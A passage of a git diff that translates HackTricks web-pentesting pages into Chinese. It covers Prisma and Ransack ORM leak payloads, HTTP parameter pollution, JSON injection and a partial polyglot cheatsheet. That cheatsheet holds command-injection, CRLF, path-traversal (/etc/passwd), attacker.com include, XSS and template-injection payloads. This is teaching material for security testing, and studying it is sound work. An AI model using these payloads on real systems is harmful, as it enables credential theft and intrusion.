-        // Attacker has full control of all prisma options
+try {
+// 攻击者对所有 prisma 选项拥有完全控制
 <strong>        const posts = await prisma.article.findMany(req.body.filter)
 </strong>        res.json(posts);
-    } catch (error) {
-        res.json([]);
-    }
+} catch (error) {
+res.json([]);
+}
 });
 </code></pre>
 
-It's possible to see that the whole javascript body is passed to prisma to perform queries.
-
-In the example from the original post, this would check all the posts createdBy someone (each post is created by someone) returning also the user info of that someone (username, password...)
+可以看到整个 javascript 主体被传递给 prisma 以执行查询。
 
+在原始帖子的示例中，这将检查所有由某人创建的帖子（每个帖子都是由某人创建的），同时返回该某人的用户信息（用户名、密码...）
 ```json
 {
-    "filter": {
-        "include": {
-            "createdBy": true
-        }
-    }
+"filter": {
+"include": {
+"createdBy": true
+}
+}
 }
 
 // Response
 [
-    {
-        "id": 1,
-        "title": "Buy Our Essential Oils",
-        "body": "They are very healthy to drink",
-        "published": true,
-        "createdById": 1,
-        "createdBy": {
-            "email": "karen@example.com",
-            "id": 1,
-            "isAdmin": false,
-            "name": "karen",
-            "password": "super secret passphrase",
-            "resetToken": "2eed5e80da4b7491"
-        }
-    },
-    ...
+{
+"id": 1,
+"title": "Buy Our Essential Oils",
+"body": "They are very healthy to drink",
+"published": true,
+"createdById": 1,
+"createdBy": {
+"email": "karen@example.com",
+"id": 1,
+"isAdmin": false,
+"name": "karen",
+"password": "super secret passphrase",
+"resetToken": "2eed5e80da4b7491"
+}
+},
+...
 ]
 ```
-
-The following one selects all the posts created by someone with a password and wil return the password:
-
+以下内容选择所有由某个拥有密码的人创建的帖子，并将返回该密码：
 ```json
 {
-    "filter": {
-        "select": {
-            "createdBy": {
-                "select": {
-                    "password": true
-                }
-            }
-        }
-    }
+"filter": {
+"select": {
+"createdBy": {
+"select": {
+"password": true
+}
+}
+}
+}
 }
 
 // Response
 [
-    {
-        "createdBy": {
-            "password": "super secret passphrase"
-        }
-    },
-    ...
+{
+"createdBy": {
+"password": "super secret passphrase"
+}
+},
+...
 ]
 ```
+- **完全的 where 子句控制**：
 
-- **Full where clause control**:
-
-Let's take a look to this where the attack can control the `where` clause:
+让我们看看攻击可以控制 `where` 子句的情况：
 
 <pre class="language-javascript"><code class="lang-javascript">app.get('/articles', async (req, res) => {
-    try {
-        const posts = await prisma.article.findMany({
-<strong>            where: req.query.filter as any // Vulnerable to ORM Leaks
+try {
+const posts = await prisma.article.findMany({
+<strong>            where: req.query.filter as any // 易受 ORM 泄漏影响
 </strong>        })
-        res.json(posts);
-    } catch (error) {
-        res.json([]);
-    }
+res.json(posts);
+} catch (error) {
+res.json([]);
+}
 });
 </code></pre>
 
-It's possible to filter the password of users directly like:
-
+可以直接过滤用户的密码，例如：
 ```javascript
 await prisma.article.findMany({
-  where: {
-    createdBy: {
-      password: {
-        startsWith: "pas",
-      },
-    },
-  },
+where: {
+createdBy: {
+password: {
+startsWith: "pas",
+},
+},
+},
 })
 ```
-
 > [!CAUTION]
-> Using operations like `startsWith` it's possible to leak information.&#x20;
-
-- **Many-to-many relational filtering bypassing filtering:**&#x20;
+> 使用像 `startsWith` 这样的操作可能会泄露信息。&#x20;
 
+- **多对多关系过滤绕过过滤：**&#x20;
 ```javascript
 app.post("/articles", async (req, res) => {
-  try {
-    const query = req.body.query
-    query.published = true
-    const posts = await prisma.article.findMany({ where: query })
-    res.json(posts)
-  } catch (error) {
-    res.json([])
-  }
+try {
+const query = req.body.query
+query.published = true
+const posts = await prisma.article.findMany({ where: query })
+res.json(posts)
+} catch (error) {
+res.json([])
+}
 })
 ```
-
-It's possible to leak not published articles by lopping back to the many-to-many relationships between `Category` -\[\*..\*]-> `Article`:
-
+通过回溯 `Category` -\[\*..\*]-> `Article` 之间的多对多关系，可以泄露未发布的文章：
 ```json
 {
-  "query": {
-    "categories": {
-      "some": {
-        "articles": {
-          "some": {
-            "published": false,
-            "{articleFieldToLeak}": {
-              "startsWith": "{testStartsWith}"
-            }
-          }
-        }
-      }
-    }
-  }
+"query": {
+"categories": {
+"some": {
+"articles": {
+"some": {
+"published": false,
+"{articleFieldToLeak}": {
+"startsWith": "{testStartsWith}"
+}
+}
+}
+}
+}
+}
 }
 ```
-
-It's also possible to leak all the users abusing some loop back many-to-many relationships:
-
+也可以通过滥用某些循环回路的多对多关系来泄露所有用户：
 ```json
 {
-  "query": {
-    "createdBy": {
-      "departments": {
-        "some": {
-          "employees": {
-            "some": {
-              "departments": {
-                "some": {
-                  "employees": {
-                    "some": {
-                      "departments": {
-                        "some": {
-                          "employees": {
-                            "some": {
-                              "{fieldToLeak}": {
-                                "startsWith": "{testStartsWith}"
-                              }
-                            }
-                          }
-                        }
-                      }
-                    }
-                  }
-                }
-              }
-            }
-          }
-        }
-      }
-    }
-  }
+"query": {
+"createdBy": {
+"departments": {
+"some": {
+"employees": {
+"some": {
+"departments": {
+"some": {
+"employees": {
+"some": {
+"departments": {
+"some": {
+"employees": {
+"some": {
+"{fieldToLeak}": {
+"startsWith": "{testStartsWith}"
+}
+}
+}
+}
+}
+}
+}
+}
+}
+}
+}
+}
+}
+}
+}
 }
 ```
-
-- **Error/Timed queries**: In the original post you can read an very extensive set of tests performed in order to find the optimal payload to leak information with a time based payload. This is:
-
+- **错误/定时查询**：在原始帖子中，您可以阅读一系列非常广泛的测试，以找到使用基于时间的有效载荷泄露信息的最佳有效载荷。这是：
 ```json
 {
-    "OR": [
-        {
-            "NOT": {ORM_LEAK}
-        },
-        {CONTAINS_LIST}
-    ]
+"OR": [
+{
+"NOT": {ORM_LEAK}
+},
+{CONTAINS_LIST}
+]
 }
 ```
-
-Where the `{CONTAINS_LIST}` is a list with 1000 strings to make sure the **response is delayed when the correct leak is found.**
+在 `{CONTAINS_LIST}` 中是一个包含1000个字符串的列表，以确保**在找到正确的泄漏时响应延迟。**
 
 ## **Ransack (Ruby)**
 
-These tricks where [**found in this post**](https://positive.security/blog/ransack-data-exfiltration)**.**
+这些技巧在[**这篇文章中发现**](https://positive.security/blog/ransack-data-exfiltration)**。**
 
 > [!TIP]
-> **Note that Ransack 4.0.0.0 now enforce the use of explicit allow list for searchable attributes and associations.**
-
-**Vulnerable example:**
+> **请注意，Ransack 4.0.0.0 现在强制使用可搜索属性和关联的显式允许列表。**
 
+**脆弱示例：**
 ```ruby
 def index
-  @q = Post.ransack(params[:q])
-  @posts = @q.result(distinct: true)
+@q = Post.ransack(params[:q])
+@posts = @q.result(distinct: true)
 end
 ```
-
-Note how the query will be defined by the parameters sent by the attacker. It was possible to for example brute-force the reset token with:
-
+注意查询将由攻击者发送的参数定义。例如，可以通过以下方式暴力破解重置令牌：
 ```http
 GET /posts?q[user_reset_password_token_start]=0
 GET /posts?q[user_reset_password_token_start]=1
 ...
 ```
+通过暴力破解和潜在的关系，可以从数据库中泄露更多数据。
 
-By brute-forcing and potentially relationships it was possible to leak more data from a database.
-
-## References
+## 参考文献
 
 - [https://www.elttam.com/blog/plormbing-your-django-orm/](https://www.elttam.com/blog/plormbing-your-django-orm/)
 - [https://www.elttam.com/blog/plorming-your-primsa-orm/](https://www.elttam.com/blog/plorming-your-primsa-orm/)
 - [https://positive.security/blog/ransack-data-exfiltration](https://positive.security/blog/ransack-data-exfiltration)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/parameter-pollution.md b/src/pentesting-web/parameter-pollution.md
index 00baf24a4..f647e8043 100644
--- a/src/pentesting-web/parameter-pollution.md
+++ b/src/pentesting-web/parameter-pollution.md
@@ -1,6 +1,6 @@
-# Parameter Pollution | JSON Injection
+# 参数污染 | JSON 注入
 
-## Parameter Pollution
+## 参数污染
 
 {{#include ../banners/hacktricks-training.md}}
 
@@ -8,209 +8,190 @@
 
 {% embed url="https://websec.nl/" %}
 
-## HTTP Parameter Pollution (HPP) Overview
+## HTTP 参数污染 (HPP) 概述
 
-HTTP Parameter Pollution (HPP) is a technique where attackers manipulate HTTP parameters to change the behavior of a web application in unintended ways. This manipulation is done by adding, modifying, or duplicating HTTP parameters. The effect of these manipulations is not directly visible to the user but can significantly alter the application's functionality on the server side, with observable impacts on the client side.
+HTTP 参数污染 (HPP) 是一种技术，攻击者通过操纵 HTTP 参数以意想不到的方式改变 Web 应用程序的行为。这种操纵是通过添加、修改或重复 HTTP 参数来实现的。这些操纵的效果对用户并不直接可见，但可以显著改变应用程序在服务器端的功能，并在客户端产生可观察的影响。
 
-### Example of HTTP Parameter Pollution (HPP)
+### HTTP 参数污染 (HPP) 示例
 
-A banking application transaction URL:
+一个银行应用程序的交易 URL：
 
-- **Original URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000`
+- **原始 URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000`
 
-By inserting an additional `from` parameter:
+通过插入一个额外的 `from` 参数：
 
-- **Manipulated URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
+- **操纵后的 URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
 
-The transaction may be incorrectly charged to `accountC` instead of `accountA`, showcasing the potential of HPP to manipulate transactions or other functionalities such as password resets, 2FA settings, or API key requests.
+交易可能错误地计入 `accountC` 而不是 `accountA`，展示了 HPP 操纵交易或其他功能（如密码重置、双因素认证设置或 API 密钥请求）的潜力。
 
-#### **Technology-Specific Parameter Parsing**
+#### **特定技术的参数解析**
 
-- The way parameters are parsed and prioritized depends on the underlying web technology, affecting how HPP can be exploited.
-- Tools like [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) help identify these technologies and their parsing behaviors.
+- 参数的解析和优先级取决于底层 Web 技术，影响 HPP 的利用方式。
+- 像 [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) 这样的工具有助于识别这些技术及其解析行为。
 
-### PHP and HPP Exploitation
+### PHP 和 HPP 利用
 
-**OTP Manipulation Case:**
+**一次性密码 (OTP) 操作案例：**
 
-- **Context:** A login mechanism requiring a One-Time Password (OTP) was exploited.
-- **Method:** By intercepting the OTP request using tools like Burp Suite, attackers duplicated the `email` parameter in the HTTP request.
-- **Outcome:** The OTP, meant for the initial email, was instead sent to the second email address specified in the manipulated request. This flaw allowed unauthorized access by circumventing the intended security measure.
+- **背景:** 一个需要一次性密码 (OTP) 的登录机制被利用。
+- **方法:** 通过使用 Burp Suite 等工具拦截 OTP 请求，攻击者在 HTTP 请求中复制了 `email` 参数。
+- **结果:** 本应发送到初始电子邮件的 OTP 被发送到操纵请求中指定的第二个电子邮件地址。这个缺陷允许通过绕过预期的安全措施获得未授权访问。
 
-This scenario highlights a critical oversight in the application's backend, which processed the first `email` parameter for OTP generation but used the last for delivery.
+这个场景突显了应用程序后端的一个关键疏忽，该后端处理第一个 `email` 参数以生成 OTP，但使用最后一个参数进行发送。
 
-**API Key Manipulation Case:**
+**API 密钥操作案例：**
 
-- **Scenario:** An application allows users to update their API key through a profile settings page.
-- **Attack Vector:** An attacker discovers that by appending an additional `api_key` parameter to the POST request, they can manipulate the outcome of the API key update function.
-- **Technique:** Utilizing a tool like Burp Suite, the attacker crafts a request that includes two `api_key` parameters: one legitimate and one malicious. The server, processing only the last occurrence, updates the API key to the attacker's provided value.
-- **Result:** The attacker gains control over the victim's API functionality, potentially accessing or modifying private data unauthorizedly.
+- **场景:** 一个应用程序允许用户通过个人资料设置页面更新他们的 API 密钥。
+- **攻击向量:** 攻击者发现通过向 POST 请求附加一个额外的 `api_key` 参数，可以操纵 API 密钥更新功能的结果。
+- **技术:** 利用像 Burp Suite 这样的工具，攻击者构造一个包含两个 `api_key` 参数的请求：一个合法的和一个恶意的。服务器只处理最后一个出现的参数，将 API 密钥更新为攻击者提供的值。
+- **结果:** 攻击者控制了受害者的 API 功能，可能未经授权访问或修改私有数据。
 
-This example further underscores the necessity for secure parameter handling, especially in features as critical as API key management.
+这个例子进一步强调了安全参数处理的必要性，特别是在像 API 密钥管理这样关键的功能中。
 
-### Parameter Parsing: Flask vs. PHP
+### 参数解析：Flask 与 PHP
 
-The way web technologies handle duplicate HTTP parameters varies, affecting their susceptibility to HPP attacks:
+Web 技术处理重复 HTTP 参数的方式各不相同，影响其对 HPP 攻击的易受攻击性：
 
-- **Flask:** Adopts the first parameter value encountered, such as `a=1` in a query string `a=1&a=2`, prioritizing the initial instance over subsequent duplicates.
-- **PHP (on Apache HTTP Server):** Contrarily, prioritizes the last parameter value, opting for `a=2` in the given example. This behavior can inadvertently facilitate HPP exploits by honoring the attacker's manipulated parameter over the original.
+- **Flask:** 采用遇到的第一个参数值，例如在查询字符串 `a=1&a=2` 中优先考虑初始实例而非后续重复。
+- **PHP (在 Apache HTTP 服务器上):** 相反，优先考虑最后一个参数值，在给定示例中选择 `a=2`。这种行为可能无意中通过优先考虑攻击者操纵的参数而促进 HPP 利用。
 
-## Parameter pollution by technology
+## 按技术的参数污染
 
-There results were taken from [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)
+结果来自 [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)
 
-### PHP 8.3.11 AND Apache 2.4.62 <a href="#id-9523" id="id-9523"></a>
+### PHP 8.3.11 和 Apache 2.4.62 <a href="#id-9523" id="id-9523"></a>
 
 <figure><img src="../images/image (1255).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*l_Pf2JNCYhmfAvfk7UTEbQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*l_Pf2JNCYhmfAvfk7UTEbQ.jpeg</a></p></figcaption></figure>
 
-1. Ignore anything after %00 in the parameter name .
-2. Handle name\[] as array .
-3. \_GET not meaning GET Method .
-4. Prefer the last parameter .
+1. 忽略参数名称中的 %00 之后的内容。
+2. 将 name\[] 视为数组。
+3. \_GET 不代表 GET 方法。
+4. 优先考虑最后一个参数。
 
-### Ruby 3.3.5 and WEBrick 1.8.2
+### Ruby 3.3.5 和 WEBrick 1.8.2
 
 <figure><img src="../images/image (1257).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*kKxtZ8qEmgTIMS81py5hhg.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*kKxtZ8qEmgTIMS81py5hhg.jpeg</a></p></figcaption></figure>
 
-1. Uses the & and ; delimiters to split parameters .
-2. Not Recognized name\[] .
-3. Prefer the first parameter .
+1. 使用 & 和 ; 分隔符来分割参数。
+2. 不识别 name\[]。
+3. 优先考虑第一个参数。
 
-### Spring MVC 6.0.23 AND Apache Tomcat 10.1.30 <a href="#dd68" id="dd68"></a>
+### Spring MVC 6.0.23 和 Apache Tomcat 10.1.30 <a href="#dd68" id="dd68"></a>
 
 <figure><img src="../images/image (1258).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*llG22MF1gPTYZYFVCmCiVw.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*llG22MF1gPTYZYFVCmCiVw.jpeg</a></p></figcaption></figure>
 
-1. POST RequestMapping == PostMapping & GET RequestMapping == GetMapping .
-2. POST RequestMapping & PostMapping Recognized name\[] .
-3. Prefer name if name AND name\[] existing .
-4. Concatenate parameters e.g. first,last .
-5. POST RequestMapping & PostMapping Recognized query parameter with Content-Type .
+1. POST RequestMapping == PostMapping & GET RequestMapping == GetMapping。
+2. POST RequestMapping & PostMapping 识别 name\[]。
+3. 如果 name 和 name\[] 同时存在，优先考虑 name。
+4. 连接参数，例如 first,last。
+5. POST RequestMapping & PostMapping 识别带有 Content-Type 的查询参数。
 
-### **NodeJS** 20.17.0 **AND** Express 4.21.0 <a href="#id-6d72" id="id-6d72"></a>
+### **NodeJS** 20.17.0 **和** Express 4.21.0 <a href="#id-6d72" id="id-6d72"></a>
 
 <figure><img src="../images/image (1259).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*JzNkLOSW7orcHXswtMHGMA.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*JzNkLOSW7orcHXswtMHGMA.jpeg</a></p></figcaption></figure>
 
-1. Recognized name\[] .
-2. Concatenate parameters e.g. first,last .
+1. 识别 name\[]。
+2. 连接参数，例如 first,last。
 
 ### GO 1.22.7 <a href="#id-63dc" id="id-63dc"></a>
 
 <figure><img src="../images/image (1260).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*NVvN1N8sL4g_Gi796FzlZA.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*NVvN1N8sL4g_Gi796FzlZA.jpeg</a></p></figcaption></figure>
 
-1. NOT Recognized name\[] .
-2. Prefer the first parameter .
+1. 不识别 name\[]。
+2. 优先考虑第一个参数。
 
-### Python 3.12.6 AND Werkzeug 3.0.4 AND Flask 3.0.3 <a href="#b853" id="b853"></a>
+### Python 3.12.6 和 Werkzeug 3.0.4 和 Flask 3.0.3 <a href="#b853" id="b853"></a>
 
 <figure><img src="../images/image (1261).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*Se5467PFFjIlmT3O7KNlWQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*Se5467PFFjIlmT3O7KNlWQ.jpeg</a></p></figcaption></figure>
 
-1. NOT Recognized name\[] .
-2. Prefer the first parameter .
+1. 不识别 name\[]。
+2. 优先考虑第一个参数。
 
-### Python 3.12.6 AND Django 4.2.15 <a href="#id-8079" id="id-8079"></a>
+### Python 3.12.6 和 Django 4.2.15 <a href="#id-8079" id="id-8079"></a>
 
 <figure><img src="../images/image (1262).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*rf38VXut5YhAx0ZhUzgT8Q.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*rf38VXut5YhAx0ZhUzgT8Q.jpeg</a></p></figcaption></figure>
 
-1. NOT Recognized name\[] .
-2. Prefer the last parameter .
+1. 不识别 name\[]。
+2. 优先考虑最后一个参数。
 
-### Python 3.12.6 AND Tornado 6.4.1 <a href="#id-2ad8" id="id-2ad8"></a>
+### Python 3.12.6 和 Tornado 6.4.1 <a href="#id-2ad8" id="id-2ad8"></a>
 
 <figure><img src="../images/image (1263).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*obCn7xahDc296JZccXM2qQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*obCn7xahDc296JZccXM2qQ.jpeg</a></p></figcaption></figure>
 
-1. NOT Recognized name\[] .
-2. Prefer the last parameter .
+1. 不识别 name\[]。
+2. 优先考虑最后一个参数。
 
-## JSON Injection
-
-### Duplicate keys
+## JSON 注入
 
+### 重复键
 ```ini
 obj = {"test": "user", "test": "admin"}
 ```
+前端可能会相信第一个出现的键，而后端则使用第二个出现的键。
 
-The front-end might believe the first ocurrence while the backend uses the second ocurrence of the key.
-
-### Key Collision: Character Truncation and Comments
-
-Certain characters aren't going to be correctly interpreted by the frontend but the backend will interpret them and use those keys, this could be useful to **bypass certain restrictions**:
+### 键冲突：字符截断和注释
 
+某些字符在前端可能无法被正确解析，但后端会解析它们并使用这些键，这可能有助于**绕过某些限制**：
 ```json
 {"test": 1, "test\[raw \x0d byte]": 2}
 {"test": 1, "test\ud800": 2}
 {"test": 1, "test"": 2}
 {"test": 1, "te\st": 2}
 ```
+注意在这些情况下，前端可能认为 `test == 1`，而后端则认为 `test == 2`。
 
-Note how in these cases the front end might think that `test == 1` and the backend will think that `test == 2`.
-
-This can also by used to bypass value restrictions like:
-
+这也可以用来绕过值限制，例如：
 ```json
 {"role": "administrator\[raw \x0d byte]"}
 {"role":"administrator\ud800"}
 {"role": "administrator""}
 {"role": "admini\strator"}
 ```
-
-### **Using Comment Truncation**
-
+### **使用注释截断**
 ```ini
 obj = {"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}
 ```
+在这里，我们将使用每个解析器的序列化器来查看其各自的输出。
 
-Here we will use the serializer from each parser to view its respective output.
-
-Serializer 1 (e.g., GoLang's GoJay library) will produce:
+序列化器 1（例如，GoLang 的 GoJay 库）将产生：
 
 - `description = "Duplicate with comments"`
 - `test = 2`
 - `extra = ""`
 
-Serializer 2 (e.g., Java's JSON-iterator library) will produce:
+序列化器 2（例如，Java 的 JSON-iterator 库）将产生：
 
 - `description = "Duplicate with comments"`
 - `extra = "/*"`
 - `extra2 = "*/"`
 - `test = 1`
 
-Alternatively, straightforward use of comments can also be effective:
-
+或者，直接使用注释也可以有效：
 ```ini
 obj = {"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}
 ```
-
-Java’s GSON library:
-
+Java的GSON库：
 ```json
 { "description": "Comment support", "test": 1, "extra": "a" }
 ```
-
-Ruby’s simdjson library:
-
+Ruby的simdjson库：
 ```json
 { "description": "Comment support", "test": 2, "extra": "a", "extra2": "b" }
 ```
-
-### **Inconsistent Precedence: Deserialization vs. Serialization**
-
+### **不一致的优先级：反序列化与序列化**
 ```ini
 obj = {"test": 1, "test": 2}
 
 obj["test"] // 1
 obj.toString() // {"test": 2}
 ```
+### 浮点数和整数
 
-### Float and Integer
-
-The number
-
+数字
 ```undefined
 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
 ```
-
-can be decoded to multiple representations, including:
-
+可以解码为多种表示，包括：
 ```undefined
 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
 9.999999999999999e95
@@ -218,10 +199,9 @@ can be decoded to multiple representations, including:
 0
 9223372036854775807
 ```
+可能会导致不一致
 
-Which might create inconsistences
-
-## References
+## 参考文献
 
 - [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)
 - [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution)
@@ -233,4 +213,3 @@ Which might create inconsistences
 {% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/phone-number-injections.md b/src/pentesting-web/phone-number-injections.md
index 00e1b1083..37fcf757f 100644
--- a/src/pentesting-web/phone-number-injections.md
+++ b/src/pentesting-web/phone-number-injections.md
@@ -1,20 +1,19 @@
-# Phone Number Injections
+# 电话号码注入
 
 {{#include ../banners/hacktricks-training.md}}
 
-It's possible to **add strings at the end the phone number** that could be used to exploit common injections (XSS, SQLi, SSRF...) or even to bypass protections:
+可以在**电话号码的末尾添加字符串**，这些字符串可能被用来利用常见的注入（XSS、SQLi、SSRF...）或甚至绕过保护：
 
 <figure><img src="../images/image (461).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
 
 <figure><img src="../images/image (941).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
 
-**OTP Bypass / Bruteforce** would work like this:
+**OTP 绕过 / 暴力破解** 的工作方式如下：
 
 <figure><img src="../images/image (116).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
 
-## References
+## 参考
 
 - [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md b/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
index dc17847bd..c399e6ad7 100644
--- a/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
+++ b/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
@@ -1,17 +1,16 @@
-# Reflecting Techniques - PoCs and Polygloths CheatSheet
+# 反射技术 - PoCs 和 Polygloths 备忘单
 
 {{#include ../../banners/hacktricks-training.md}}
 
-The goal of these PoCs and Polygloths is to give the tester a fast **summary** of vulnerabilities he may exploit if his **input is somehow being reflected in the response**.
+这些 PoCs 和 Polygloths 的目标是为测试人员提供一个快速的 **摘要**，以便他可以利用 **如果他的输入以某种方式反射在响应中** 的漏洞。
 
 > [!WARNING]
-> This **cheatsheet doesn't propose a comprehensive list of tests for each vulnerability**, just some basic ones. If you are looking for more comprehensive tests, access each vulnerability proposed.
+> 这个 **备忘单并没有提供每个漏洞的全面测试列表**，只是一些基本的测试。如果您在寻找更全面的测试，请访问每个提议的漏洞。
 
 > [!CAUTION]
-> You **won't find Content-Type dependant injections like XXE**, as usually you will try those yourself if you find a request sending xml data. You **won't also find database injections** here as even if some content might be reflected it depends heavily on the backend DB technology and structure.
-
-## Polygloths list
+> 您 **不会找到依赖于 Content-Type 的注入，如 XXE**，因为通常如果您发现发送 xml 数据的请求，您会自己尝试这些。您 **在这里也不会找到数据库注入**，因为即使某些内容可能被反射，它也在很大程度上依赖于后端数据库技术和结构。
 
+## Polygloths 列表
 ```python
 {{7*7}}[7*7]
 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
@@ -51,26 +50,20 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
 " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
 ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
 ```
+## [客户端模板注入](../client-side-template-injection-csti.md)
 
-## [Client Side Template Injection](../client-side-template-injection-csti.md)
-
-### Basic Tests
-
+### 基本测试
 ```
 {{7*7}}
 [7*7]
 ```
-
-### Polygloths
-
+### 多语言者
 ```bash
 {{7*7}}[7*7]
 ```
+## [命令注入](../command-injection.md)
 
-## [Command Injection](../command-injection.md)
-
-### Basic Tests
-
+### 基本测试
 ```bash
 ;ls
 ||ls;
@@ -81,37 +74,29 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
 `ls`
 $(ls)
 ```
-
-### Polygloths
-
+### 多语言者
 ```bash
 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
 ```
-
 ## [CRLF](../crlf-0d-0a.md)
 
-### Basic Tests
-
+### 基本测试
 ```bash
 %0d%0aLocation:%20http://attacker.com
 %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
 %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
 %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
 ```
+## 悬挂标记
 
-## Dangling Markup
-
-### Basic Tests
-
+### 基本测试
 ```markup
 <br><b><h1>THIS IS AND INJECTED TITLE </h1>
 ```
+## [文件包含/路径遍历](../file-inclusion/)
 
-## [File Inclusion/Path Traversal](../file-inclusion/)
-
-### Basic Tests
-
+### 基本测试
 ```bash
 /etc/passwd
 ../../../../../../etc/hosts
@@ -124,11 +109,9 @@ C:/windows/system32/drivers/etc/hosts
 http://asdasdasdasd.burpcollab.com/mal.php
 \\asdasdasdasd.burpcollab.com/mal.php
 ```
+## [开放重定向](../open-redirect.md) / [服务器端请求伪造](../ssrf-server-side-request-forgery/)
 
-## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
-
-### Basic Tests
-
+### 基本测试
 ```bash
 www.whitelisted.com
 www.whitelisted.com.evil.com
@@ -136,42 +119,34 @@ https://google.com
 //google.com
 javascript:alert(1)
 ```
-
 ## [ReDoS](../regular-expression-denial-of-service-redos.md)
 
-### Basic Tests
-
+### 基本测试
 ```bash
 (\\w*)+$
 ([a-zA-Z]+)*$
 ((a+)+)+$
 ```
+## [服务器端包含/边缘端包含](../server-side-inclusion-edge-side-inclusion-injection.md)
 
-## [Server Side Inclusion/Edge Side Inclusion](../server-side-inclusion-edge-side-inclusion-injection.md)
-
-### Basic Tests
-
+### 基本测试
 ```markup
 <!--#echo var="DATE_LOCAL" -->
 <!--#exec cmd="ls" -->
 <esi:include src=http://attacker.com/>
 x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
 ```
-
-### Polygloths
-
+### 多语言者
 ```markup
 <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
 ```
+## [服务器端请求伪造](../ssrf-server-side-request-forgery/)
 
-## [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
+可以在这里使用与开放重定向相同的测试。
 
-The same tests used for Open Redirect can be used here.
-
-## [Server Side Template Injection](../ssti-server-side-template-injection/)
-
-### Basic Tests
+## [服务器端模板注入](../ssti-server-side-template-injection/)
 
+### 基本测试
 ```markup
 ${{<%[%'"}}%\
